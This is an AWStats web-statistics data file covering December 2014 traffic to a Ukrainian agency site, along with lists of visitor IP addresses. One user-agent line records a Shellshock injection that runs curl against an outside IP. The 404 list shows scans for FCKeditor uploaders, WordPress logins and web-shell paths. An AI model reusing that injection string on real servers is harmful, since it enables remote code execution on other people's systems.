AWSTATS DATA FILE 6.95 (build 1.943)
# If you remove this file, all statistics for date 201412 will be lost/reset.
# Last config file used to build this data file was /usr/local/etc/awstats/awstats.lime.com.ua.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2018                
POS_TIME 2690                
POS_VISITOR 14793               
POS_DAY 27239               
POS_DOMAIN 3518                
POS_LOGIN 4023                
POS_ROBOT 4178                
POS_WORMS 5120                
POS_EMAILSENDER 5251                
POS_EMAILRECEIVER 5394                
POS_SESSION 28085               
POS_SIDER 28281               
POS_FILETYPES 5529                
POS_OS 5652                
POS_BROWSER 5865                
POS_SCREENSIZE 7183                
POS_UNKNOWNREFERER 7257                
POS_UNKNOWNREFERERBROWSER 7715                
POS_ORIGIN 8221                
POS_SEREFERRALS 8363                
POS_PAGEREFS 8533                
POS_SEARCHWORDS 9305                
POS_KEYWORDS 9622                
POS_MISC 2354                
POS_ERRORS 9850                
POS_CLUSTER 3879                
POS_SIDER_404 9959                
POS_PLUGIN_geoip_city_maxmind 13292               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20150101002250 1 0 10858454321146
FirstTime 20141201093014
LastTime 20141231181228
LastUpdate 20150102000118 1 0 0 0 0
TotalVisits 401                 
TotalUnique 316                 
MonthHostsKnown 0                   
MonthHostsUnknown 319                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 13 19 3018994 24 33 39233
1 14 17 2261211 41 45 198387
2 10 10 19980 66 69 1555088
3 12 14 773409 22 25 773494
4 7 8 20338 26 27 779761
5 6 7 757067 41 46 784379
6 12 15 1518488 46 50 2282260
7 11 12 26332 69 72 66099
8 7 7 13986 83 86 867794
9 38 51 6068316 143 161 903718
10 20 27 4514788 73 84 1573003
11 38 51 8284497 44 62 1678847
12 30 40 6768007 34 48 1529003
13 45 61 8317539 56 78 829977
14 52 69 9068254 37 53 791648
15 27 35 6014578 54 71 1570430
16 60 85 12809681 39 67 74167
17 20 26 2291790 59 63 1557389
18 60 69 6084866 53 60 811244
19 22 30 6004588 40 48 2275112
20 33 45 5306895 33 43 1520673
21 24 27 2281191 55 65 55993
22 26 34 5271855 32 36 1508778
23 17 20 791749 52 55 50517
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 20
ua 268 380 65492620
us 97 109 3961667
unknown 71 93 11343857
ru 44 60 12009176
jp 36 36 71928
gb 21 23 1532116
eu 16 17 38320
pl 15 16 763061
de 9 11 1508140
cn 6 8 24692
tr 1 1 1998
no 2 3 10348
fr 6 8 763419
in 1 1 1998
cz 1 1 1998
by 4 6 753071
lt 1 1 1998
se 2 2 3996
lu 2 2 3996
pe 1 1 0
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 23
googlebot 299 17907406 20141231221729 0
yandex 197 395497 20141231201845 0
bot[\s_+:,\.\;\/\\-] 52 4538662 20141231115642 0
no_user_agent 40 85593 20141231104744 0
mj12bot 33 65934 20141231172426 0
exabot 14 766699 20141230235756 0
facebook 13 37261 20141225130021 0
netcraft 10 5994 20141229025835 0
robot 9 5994 20141231111254 0
java\/[0-9] 6 25050 20141217083540 0
commons\-httpclient 2 7778 20141224123713 0
ia_archiver 1 1998 20141203151851 0
spider 1 1998 20141228192950 0
seznambot 2 3996 20141208132946 0
mail\.ru 4 7992 20141217221543 0
slurp 2 3996 20141212172354 0
python 1 1998 20141212165130 0
heritrix 1 1998 20141230180019 0
surveybot 4 7992 20141223110934 0
titan 3 5994 20141228012552 0
archive\.org_bot 5 20589 20141229112621 0
favicon 4 7992 20141227085304 0
crawl 6 11988 20141222110253 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 4
html 473 923124 0 0
js 174 1067136 0 0
jpg 1 3889 0 0
swf 131 96294250 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 16
blackberry 1
linuxandroid 23
winxp 80
winlong 36
win2000 1
java 2
winnt 1
linuxubuntu 2
winvista 48
linux 50
macosx 107
winunknown 1
j2me 3
win2003 7
Unknown 45
win2008 372
END_OS

# Browser ID - Hits
BEGIN_BROWSER 78
msie6.0 4
safari7.0.3 2
firefox28.0 2
firefox3.6 1
chrome34.0.1847.137 1
firefox2.0.0.1 2
chrome39.0.2171.95 95
firefox4.0 4
msie4.01 1
firefox18.0 4
chrome38.0.2125.111 13
chrome31.0.1650.57 3
curl 1
chrome31.0.1650.63 7
firefox34.0 30
firefox2.0.0.13 1
msie8.0 30
chrome39.0.2171.65 22
msie7.0 42
firefox23.0 1
chrome37.0.2062.120 3
chrome31.0.1650.59 6
chrome39.0.2171.71 114
chrome37.0.2049.0 1
chrome34.0.1847.131 16
chrome10.0.648.133 1
firefox21.0 2
firefox29.0 2
firefox3.5.2 1
firefox12.0 1
firefox3.6.23 1
chrome36.0.1985.143 5
firefox33.0 13
mozilla 11
firefox14.0.1 1
chrome17.0.963.65 1
safari8.0.2 4
chrome41.0.2228.0 1
firefox19.0 1
safari 21
safari7.0 11
chrome37.0.2062.124 3
firefox5.0 3
chrome29.0.1547.57 2
firefox4.0.1 2
chrome29.0.1547.76 3
android 3
chrome28.0.1500.95 3
chrome21.0.1231.0 3
chrome36.0.1985.125 3
opera9.80 6
safari6.1.6 5
firefox31.0 10
iphone 7
firefox6.0.2 2
chrome38.0.2125.122 6
chrome10.0.648.204 8
safari8.0 30
msie9.0 45
chrome26.0.1410.43 3
Unknown 46
firefox27.0 1
chrome30.0.0.0 2
safari7.1 10
firefox32.0 1
chrome39.0.2171.93 16
blackberry 1
vodafone 2
chrome14.0.808.0 1
chrome27.0.1453.110 1
chrome39.0.2171.59 4
firefox3.0.5 1
firefox1.0 1
firefox22.0 23
msie28.0 1
msie10.0 24
firefox6.0 2
chrome23.0.1271.97 12
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 8
SEOstats_2.1.0 20141213133639
Firefox 20141219032304
(compatible; 20141213024639
Mechanize/2.7.2_Ruby/2.0.0p481_(http://github.com/sparklemotion/mechanize/) 20141230080322
DomainWho.is/1.0 20141215052632
Mozilla/4.0_(compatible;_Synapse) 20141201213707
NerdyBot 20141231181228
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=limebtl.com/' 20141216212639
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 9
SEOstats_2.1.0 20141213133639
Apache-HttpClient/4.1.1_(java_1.5) 20141225022921
Firefox 20141219032304
(compatible; 20141213024639
Airmail_2.0.1_rv:280_(Macintosh;_Mac_OS_X_10.10.1;_ru_UA) 20141206092655
Mechanize/2.7.2_Ruby/2.0.0p481_(http://github.com/sparklemotion/mechanize/) 20141230080322
Airmail_2.0.2_rv:284_(Macintosh;_Mac_OS_X_10.10.1;_ru_UA) 20141218140812
DomainWho.is/1.0 20141215052632
NerdyBot 20141231181228
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 360 361
From1 0 0
From2 56 57
From3 150 276
From4 38 85
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
google 43 44
yandex 13 13
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 19
http://limebtl.com 56 127
http://www.limebtl.com 40 91
http://www.talant.ua 11 11
http://talant.ua 8 8
http://rabota.ua/company387684/vacancy5576992 6 6
http://m.facebook.com 5 5
http://www.limebtl.com. 4 8
http://www.mami.org.ua/news/market-news/3625 3 3
http://talant.ua/talant-v1.swf 3 3
https://www.facebook.com 3 3
http://kiev.hh.ua/employer/218914 1 1
http://www.weblinkvalidator.com 1 1
http://hh.ua/employer/218914 1 1
http://yandex.ua/clck/jsredir 1 1
http://www.talant.ua/talant-v1.swf 1 1
http://l.facebook.com/lsr.php 2 2
http://privhosting.com 1 1
http://limebtl.com/index.swf 2 2
http://www.maxshaman.com 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 6
www.lime-on 4
limefresh 2
www.lime.com 2
%d0%bb%d0%b0%d0%b9%d0%bc+%d1%84%d1%80%d0%b5%d1%88 2
www.wumen+lime.com 1
%d1%84%d1%80%d0%b5%d1%88%d0%bb%d0%b0%d0%b9%d0%bc 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 8
www.lime-on 4
limefresh 2
www.lime.com 2
%d1%84%d1%80%d0%b5%d1%88 2
%d0%bb%d0%b0%d0%b9%d0%bc 2
%d1%84%d1%80%d0%b5%d1%88%d0%bb%d0%b0%d0%b9%d0%bc 1
www.wumen 1
lime.com 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 3
403 1 0
206 1 3889
404 550 150708
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 101
/phpMyAdmin/index.php 1 -
/robots.txt 334 -
/administrator/fckeditor1/editor/fckeditor.html 1 -
/user 8 -
/admin.php 13 -
/transparent/i 1 -
/login/editors/fckeditor/editor/fckeditor.html 1 -
/he/she 1 -
/logout.php 1 -
/dialog/oauth 1 -
/dialog/ 1 -
/admin/login.php 2 -
/restserver.php 1 -
/wordpress/wp-login.php 4 -
/admin/index.php 2 -
/plugins/comments_v1.php 1 -
/me/apprequestformerrecipients 1 -
/g 1 -
/admin/wp-login.php 4 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/FCKeditor/editor/filemanager/connectors/uploadtest.html 2 -
/plugins/ 1 -
/common/widget_pipe_shell.php 1 -
/admin/editor/fckeditor.html 1 -
/fql 1 -
/fckeditor1/editor/fckeditor.html 1 -
/admin/fckeditor_ap/editor/fckeditor.html 1 -
/bitrix/admin/index.php 2 -
/occludespopups 1 -
/.php 2 -
/manage/editor/fckeditor.html 1 -
/editor/fckeditor.html 1 -
/administrator/editors/fckeditor/fckeditor.html 1 -
/edit/editor/fckeditor.html 1 -
/cgi-sys/entropysearch.cgi 1 -
/FCKeditor/editor/fckeditor.html 1 -
/application/vnd.unity 1 -
/includes/editors/fckeditor/editor/fckeditor.html 1 -
/administrator/ 2 -
/editor/editor/filemanager/browser/default/connectors/test.html 2 -
/blog/wp-login.php 4 -
/MusuMama 1 http://www.limebtl.com/
/wp-login.php 32 -
/js/fckeditor/editor/fckeditor.html 1 -
/Administrator/fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/site/wp-login.php 4 -
/manage/fckeditor/editor/fckeditor.html 1 -
/Administrator/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/oa/fckeditor/editor/fckeditor.html 1 -
/common/scribe_endpoint.php 2 -
/text/javascript 1 -
/ba 1 -
/himself/herself 1 -
/apple-touch-icon.png 2 -
/system/fckeditor/editor/fckeditor.html 1 -
/plugins/plugin_pipe_shell.php 1 -
/v2.1/ 1 -
/wp-login/ 4 -
/WebAdmin/FCKeditor/editor/fckeditor.html 1 -
/text/css 1 -
/plugins/pipe.php 1 -
/admin/system/editor/fckeditor/editor/fckeditor.html 1 -
/application/x-shockwave-flash 1 -
/his/her 1 -
/admin/fck/editor/fckeditor.html 1 -
/admin/fckeditor/editor/fckeditor.html 1 -
/wp-admin/admin-ajax.php 4 -
/admin/editors/fckeditor/editor/fckeditor.html 1 -
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/admin/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/xd/verify 1 -
/fckeditor_ap/editor/fckeditor.html 1 -
/editor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/me/permissions 1 -
/\"%20+%20gaJsHost%20+%20\"google-analytics.com/ga.js 3 -
/wp/wp-login.php 4 -
/cms/fckeditor/editor/fckeditor.html 1 -
/section/wp-login.php 4 -
/sharer.php 1 -
/user/ 2 -
/bbadmin/editors/fckeditor/editor/fckeditor.html 1 -
/btnfr 1 -
/connect/ping 1 -
/xd/reposition 1 -
/administrator/index.php 25 -
/public/js/fckeditor/fckeditor.html 1 -
/path/fckeditor/editor/fckeditor.html 1 -
/administrator/fckeditor/editor/fckeditor.html 1 -
/admin/fckeditor1/editor/fckeditor.html 1 -
/document 1 -
/editors/fckeditor/editor/fckeditor.html 1 -
/v1.0/ 1 -
/application/x-www-form-urlencoded 1 -
/staticresources 1 -
/impression.php/ 1 -
/webmanage/fckeditor/editor/fckeditor.html 1 -
/fck/editor/fckeditor.html 1 -
/phpmyadmin/index.php 1 -
/him/her 1 -
/mods/ckeditor/fckeditor.html 1 -
/N/A 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 50
unknown 0 531 0 0
ua_kiev_13 0 62 0 0
us_woodbridge_nj 0 28 0 0
ua_odessa_17 0 19 0 0
us_los%20angeles_ca 0 18 0 0
ru_moscow_48 0 11 0 0
us_nanuet_ny 0 8 0 0
by_gomel_02 0 6 0 0
ua_dnepropetrovsk_04 0 6 0 0
cn_shenzhen_30 0 5 0 0
ua_lvov_15 0 3 0 0
de_kiez_12 0 1 0 0
us_sterling_va 0 2 0 0
tr_izmir_35 0 1 0 0
ua_simferopol_11 0 3 0 0
us_marblehead_ma 0 1 0 0
us_mountain%20view_ca 0 2 0 0
ru_tver_77 0 2 0 0
us_saint%20louis_mo 0 2 0 0
us_sunnyvale_ca 0 1 0 0
ua_cherkasy_01 0 3 0 0
pl_polska_77 0 1 0 0
us_miami%20beach_fl 0 1 0 0
us_simi%20valley_ca 0 4 0 0
ua_dmitriy_17 0 2 0 0
us_washington_dc 0 2 0 0
ua_zaporozhye_26 0 4 0 0
us_richmond_va 0 4 0 0
ua_kharkov_07 0 3 0 0
ru_yekaterinburg_71 0 3 0 0
us_houston_tx 0 1 0 0
de_nürnberg_02 0 1 0 0
ru_kurgan_40 0 1 0 0
de_munich_02 0 3 0 0
us_langhorne_pa 0 1 0 0
ua_ternopil_22 0 3 0 0
ua_vinogradar_17 0 3 0 0
ua_kherson_08 0 2 0 0
us_seattle_wa 0 5 0 0
ua_zhytomyr_27 0 1 0 0
us_kansas%20city_mo 0 2 0 0
ua_mirgorod_07 0 3 0 0
pe_lima_15 0 1 0 0
cz_krupka_89 0 1 0 0
us_phoenix_az 0 1 0 0
ru_vladimir_83 0 2 0 0
de_leipzig_13 0 1 0 0
us_brooklyn_ny 0 1 0 0
ua_donetsk_05 0 3 0 0
ua_nikolaev_16 0 4 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 319
91.142.167.100 14 19 798459 20141221121615
188.116.54.12 12 12 11988 20141225060422
62.149.24.19 10 14 2261569 20141209150255
198.252.44.10 8 8 15984 20141229051727
119.63.193.131 7 7 13986 20141223205555
119.63.193.132 7 7 13986 20141230045413
178.216.9.234 6 8 1502146 20141217164953
119.63.193.196 6 6 11988 20141222205639
195.138.83.52 6 9 769771 20141215140901
89.209.83.241 6 10 763419 20141229180259
185.11.28.48 1 2 8350 20141201122441
130.211.129.197 1 1 1998 20141226181325
195.60.201.35 2 4 752964 20141211170539
46.254.75.1 2 3 749075 20141214210259
69.58.178.56 2 2 3996 20141211234259
130.211.120.184 1 1 1998 20141218181457
95.133.83.123 1 1 1998 20141226152838
82.193.105.19 2 3 749075 20141231103846
54.189.108.148 2 2 3996 20141216081531
49.204.38.213 1 1 1998 20141229081432
217.69.133.169 4 4 7992 20141223055430
146.52.233.133 1 1 1998 20141213142615
78.25.23.81 4 6 1498150 20141217093213
178.136.218.250 2 3 749075 20141216114039
46.200.186.25 4 5 753071 20141217133548
188.42.240.119 2 2 3996 20141227031129
54.145.159.89 1 1 1998 20141217121517
95.67.74.226 4 6 1498150 20141219141425
46.33.246.125 2 3 749075 20141209191421
130.211.173.41 1 1 1998 20141231181228
23.251.149.175 1 1 1998 20141214181456
80.78.51.141 2 3 749075 20141201132332
178.151.119.232 2 3 749075 20141211201818
46.173.66.131 1 1 1998 20141206185408
185.10.104.196 1 1 1998 20141230235947
62.216.44.250 2 3 749075 20141202155215
199.30.25.7 2 3 749075 20141229193235
162.222.180.111 1 1 1998 20141212181519
83.223.122.15 1 1 1998 20141218182130
130.211.189.218 1 1 1998 20141224181240
66.249.81.221 1 1 1998 20141208111135
62.210.124.165 1 1 1998 20141206170628
50.16.20.108 2 2 3996 20141210220848
134.249.130.233 2 3 749075 20141221121716
94.45.43.2 5 6 755069 20141205135628
83.223.122.25 2 2 3996 20141225171031
93.72.173.67 2 3 749075 20141212120700
188.230.49.51 2 3 10348 20141212222023
176.215.128.60 1 1 1998 20141201213707
146.148.89.122 1 1 1998 20141219181413
190.235.116.249 1 1 0 20141207221856
95.133.64.103 1 1 1998 20141203124608
83.223.122.18 1 1 1998 20141212123612
91.200.13.64 1 1 1998 20141227103039
54.204.195.206 2 2 3996 20141226023754
91.198.10.19 2 3 749075 20141216164234
70.39.157.197 2 2 3996 20141225171036
81.23.16.57 2 3 749075 20141219154357
85.10.199.67 1 1 1998 20141205183623
188.35.23.146 2 3 749075 20141230222923
54.211.10.236 2 2 3996 20141218001042
130.211.163.232 1 1 1998 20141205181605
217.77.221.163 2 3 749075 20141212195204
31.43.122.133 1 1 1998 20141216233327
176.14.129.160 2 3 749075 20141201191749
92.244.107.79 1 2 8350 20141206183209
130.211.134.144 1 1 1998 20141220181352
130.211.136.38 1 1 1998 20141221181302
80.250.174.1 3 4 12346 20141218115411
54.68.248.212 1 1 1998 20141226112531
176.57.50.71 4 8 20696 20141201161901
95.25.189.42 2 3 749075 20141215183302
94.179.21.108 2 3 749075 20141209205615
216.172.56.37 1 1 1998 20141210144350
91.226.58.129 2 3 10348 20141214234240
93.179.69.169 2 2 742723 20141219090056
130.211.156.8 1 1 1998 20141225181244
46.188.50.164 2 3 749075 20141221202714
37.191.132.25 2 3 749075 20141226001520
130.211.153.125 1 1 1998 20141228181241
194.44.147.240 2 3 749075 20141222114909
87.76.71.52 2 3 749075 20141215111029
93.92.217.228 1 1 1998 20141216084118
176.36.116.79 1 1 48 20141203163223
54.174.192.198 1 1 1998 20141205215134
209.133.77.165 1 1 1998 20141225143714
208.80.194.121 1 1 1998 20141201112618
95.67.67.54 2 3 749075 20141204131540
95.25.71.211 2 3 749075 20141214003129
37.57.243.39 2 2 3996 20141218140812
178.212.102.67 2 3 749075 20141228213711
109.108.84.88 2 3 749075 20141205095426
202.46.56.42 1 1 1998 20141224205455
95.133.58.181 1 1 1998 20141204162439
2.94.223.118 2 3 749075 20141201143132
54.148.16.161 1 2 8350 20141225163636
88.81.252.114 1 2 8350 20141201132117
62.80.173.51 5 7 1500148 20141201161834
83.223.122.6 3 3 5994 20141225210047
130.211.189.122 1 1 1998 20141204181455
46.229.170.197 3 3 5994 20141229135632
182.118.53.178 1 2 8350 20141210161937
24.34.161.121 1 1 1998 20141228032954
46.119.238.13 2 3 749075 20141217193707
195.88.191.252 1 1 1998 20141207193616
89.66.66.178 1 1 1998 20141220065612
54.149.23.2 1 1 1998 20141219140326
108.62.156.254 1 1 1998 20141225163006
130.211.162.96 1 1 1998 20141229181303
54.188.15.156 2 2 3996 20141202083335
77.90.193.210 2 3 749075 20141201170028
213.87.137.100 1 2 8350 20141208132758
5.228.36.83 2 3 749075 20141213224551
178.95.31.86 1 1 1998 20141209213713
198.199.71.16 1 2 8350 20141226095624
46.229.170.193 1 1 1998 20141219071819
37.130.226.90 2 2 3996 20141227211149
46.118.118.134 1 1 1998 20141214235613
92.113.162.141 2 3 749075 20141214205809
95.133.17.3 1 1 1998 20141212010803
193.33.65.162 1 2 8350 20141209231438
70.39.157.199 1 1 1998 20141225143714
178.95.29.44 1 1 1998 20141215203818
81.1.183.52 2 3 749075 20141208054243
46.229.167.149 4 4 7992 20141229171721
31.172.136.9 2 3 749075 20141202003610
89.145.108.202 1 1 1998 20141218173818
212.83.128.246 1 1 740725 20141217203045
46.38.97.50 2 3 749075 20141215145122
37.213.123.121 1 1 1998 20141228182448
212.23.92.85 2 3 749075 20141216110126
85.25.95.148 1 1 1998 20141222212343
95.158.7.234 3 4 751073 20141204135114
150.70.97.69 1 1 1998 20141212133848
69.195.129.178 1 1 1998 20141222212237
46.219.113.134 2 3 749075 20141211131945
95.133.40.34 1 1 1998 20141202200808
130.211.179.131 1 1 1998 20141201181616
130.211.113.68 1 1 1998 20141230181229
130.211.166.33 1 1 1998 20141207180447
82.145.222.0 2 3 10348 20141215132909
212.90.61.68 5 6 753071 20141202205513
185.72.244.38 1 1 0 20141216012216
95.133.17.208 1 1 1998 20141205204710
202.46.54.40 1 1 1998 20141223145653
185.10.104.194 1 1 1998 20141208072503
54.85.50.253 2 2 3996 20141202093653
54.174.203.80 1 1 1998 20141205215134
91.121.176.47 1 1 1998 20141215052632
212.78.105.49 1 1 1998 20141212070333
95.133.16.6 1 1 1998 20141225001728
176.193.194.94 2 3 749075 20141214220557
54.165.222.214 1 1 1998 20141204220035
95.181.179.91 2 2 742723 20141205064935
91.212.80.57 2 3 749075 20141204130509
95.133.64.221 1 1 1998 20141210224631
176.37.27.190 2 3 749075 20141207163453
192.99.9.164 1 1 1998 20141231131528
85.142.20.210 1 1 1998 20141214063902
69.30.241.18 1 1 1998 20141203121013
194.247.37.13 3 4 751073 20141218092414
130.211.153.182 1 1 1998 20141203181506
176.37.192.45 2 3 749075 20141209152725
94.244.34.155 2 3 749075 20141203015332
134.249.89.241 2 3 749075 20141211193741
95.133.8.160 1 1 1998 20141208200118
37.115.123.193 2 3 749075 20141211115100
95.158.48.177 2 3 749075 20141209103648
178.151.62.7 1 2 8350 20141217205332
202.46.56.140 0 1 6352 
217.33.154.235 2 3 749075 20141229163534
91.217.179.16 2 3 749075 20141227220210
193.109.128.146 2 2 3996 20141209211624
146.148.64.66 1 1 1998 20141202181503
91.203.63.14 2 3 749075 20141230105420
95.133.21.207 1 1 1998 20141216201808
96.227.124.37 1 1 1998 20141208203015
83.223.122.12 3 3 5994 20141225143714
83.242.160.98 2 3 749075 20141224182341
176.102.38.36 1 1 0 20141216212639
89.145.108.205 1 1 1998 20141204175048
195.174.141.86 1 1 1998 20141225000605
198.211.117.220 1 2 8350 20141220035306
62.210.96.36 1 1 1998 20141229033841
183.57.154.91 1 1 1998 20141210161933
89.19.113.126 2 3 749075 20141219132051
82.193.98.81 2 3 749075 20141205100248
91.209.139.87 2 3 749075 20141208225133
5.9.11.122 1 1 1998 20141213090140
95.133.147.139 2 3 749075 20141215110902
176.37.190.35 2 3 749075 20141203115851
95.158.48.6 2 3 749075 20141227120917
23.236.57.204 1 1 1998 20141223181256
119.63.193.195 4 4 7992 20141218111258
95.28.26.29 2 3 749075 20141228032346
130.211.136.5 1 1 1998 20141222181324
198.211.110.12 1 2 8350 20141208062501
80.91.174.42 2 3 749075 20141203095349
46.53.181.86 4 6 753071 20141203144922
217.77.222.164 4 6 1498150 20141210141037
95.133.141.1 1 1 1998 20141201224904
37.115.104.84 2 3 749075 20141202212210
202.46.53.31 1 1 1998 20141203085530
209.133.77.170 1 1 1998 20141212114422
199.30.25.222 1 1 740725 20141230125224
54.211.44.198 2 2 3996 20141204030340
38.100.21.69 1 1 1998 20141215211818
193.93.77.150 2 3 749075 20141225130021
95.133.25.42 1 1 1998 20141219161712
78.137.39.106 2 3 749075 20141222235212
93.171.205.23 1 1 1998 20141222123520
213.186.202.48 2 3 749075 20141210094953
95.135.28.230 2 3 749075 20141204105056
185.10.104.131 2 2 3996 20141211230250
176.15.243.13 2 3 749075 20141231013126
176.37.65.5 1 2 8350 20141225125413
46.46.93.122 2 3 749075 20141212203909
100.66.8.213 2 3 749075 20141209191349
193.34.218.38 1 2 8350 20141210073555
194.202.140.48 2 3 749075 20141215160140
209.133.77.168 2 2 3996 20141218165824
95.133.95.244 1 1 1998 20141218150900
199.19.249.196 1 1 1998 20141219154353
38.100.21.64 1 1 1998 20141220133505
146.148.68.67 1 1 1998 20141227181230
46.33.248.77 2 3 749075 20141204172700
130.211.48.166 1 1 1998 20141217100715
119.63.193.194 4 4 7992 20141226145833
107.178.218.135 1 1 1998 20141213181500
54.184.71.83 2 2 3996 20141230080322
81.24.208.67 3 4 12346 20141228170257
213.108.75.188 3 4 751073 20141202154102
91.200.234.218 4 6 1498150 20141226190509
62.210.75.243 2 4 16700 20141231171244
2.93.193.227 2 3 749075 20141225221736
91.243.212.165 1 2 8350 20141222132736
83.223.122.11 1 1 1998 20141204180148
150.70.173.42 1 1 1998 20141212212508
54.148.139.53 1 1 1998 20141225163628
77.120.152.31 2 3 10348 20141215100132
130.211.149.52 1 1 1998 20141208181550
209.133.77.166 3 3 5994 20141218183957
209.133.77.164 1 1 1998 20141212152357
185.10.104.130 4 4 7992 20141228111018
95.135.58.139 3 4 751073 20141210224559
202.46.48.13 1 1 1998 20141206025617
87.143.168.5 2 3 749075 20141219183832
70.39.157.195 1 1 1998 20141225164024
83.223.122.23 3 3 5994 20141218183929
93.126.123.178 1 2 8350 20141201093014
209.133.77.167 1 1 1998 20141204133736
95.133.146.74 4 6 1498150 20141211112649
70.39.157.196 1 1 1998 20141218165731
199.30.228.139 2 3 749075 20141218135121
54.148.45.105 0 1 6352 
46.211.148.197 0 1 6352 
54.149.172.158 1 1 1998 20141226112520
195.234.70.242 5 7 1500148 20141208110104
213.159.38.90 1 1 1998 20141209141620
74.52.245.146 1 1 1998 20141206065459
130.185.139.213 2 2 3996 20141224161053
46.98.166.92 3 4 751073 20141211143750
217.12.211.130 2 3 749075 20141215185646
178.212.75.147 2 3 749075 20141220161705
166.137.252.93 1 3 14702 20141221201530
198.211.102.105 1 2 8350 20141214044534
188.138.1.229 1 1 1998 20141213024639
77.93.35.125 2 3 749075 20141201114716
89.145.108.207 1 1 1998 20141218213731
107.178.214.51 1 1 1998 20141215181520
107.155.70.196 2 2 1998 20141219032304
93.73.7.84 2 3 749075 20141211142901
69.64.32.191 2 2 3996 20141213133639
93.75.51.225 2 3 749075 20141206180843
176.37.100.112 2 3 749075 20141223161058
213.154.210.93 2 3 749075 20141216153736
93.72.28.84 2 3 749075 20141203184828
77.50.83.210 2 3 749075 20141203124716
70.39.157.198 2 2 3996 20141218180143
195.88.242.35 2 2 3996 20141225022921
2.94.153.26 2 3 749075 20141226143604
83.223.122.22 2 2 3996 20141212152356
178.216.225.87 2 3 749075 20141212012401
193.19.84.90 5 7 1500148 20141209164603
162.222.182.95 1 1 1998 20141210181521
54.154.104.195 1 1 1998 20141224012039
146.148.88.122 1 1 1998 20141217221855
178.95.55.208 1 1 1998 20141218020748
46.188.121.246 2 3 749075 20141220155723
195.5.42.193 2 3 749075 20141209104552
70.39.157.193 1 1 1998 20141218173821
77.91.171.19 3 6 18698 20141225200718
178.150.229.55 2 3 749075 20141213162855
195.24.138.206 2 3 749075 20141202143345
150.70.173.49 1 1 1998 20141211171739
209.133.77.169 1 1 1998 20141212144419
54.173.182.11 1 1 1998 20141210035307
213.169.82.7 1 1 1998 20141220232333
217.77.221.25 3 4 751073 20141203154719
185.10.104.132 4 4 7992 20141216043834
213.169.86.150 2 3 749075 20141220201400
54.172.157.246 1 1 1998 20141204230811
148.251.154.4 1 1 1998 20141224182953
95.129.166.184 1 1 1998 20141201123522
130.211.189.58 1 1 1998 20141206181533
213.227.201.225 4 6 1498150 20141201163941
150.70.97.114 2 2 3996 20141218170008
46.200.63.243 1 2 8350 20141220001455
173.255.116.162 1 1 1998 20141211181515
119.63.193.130 3 3 5994 20141222110856
208.110.85.226 1 1 1998 20141216042351
46.118.127.165 2 3 749075 20141231000512
130.211.151.202 1 1 1998 20141209181518
188.163.15.160 1 1 1998 20141214100147
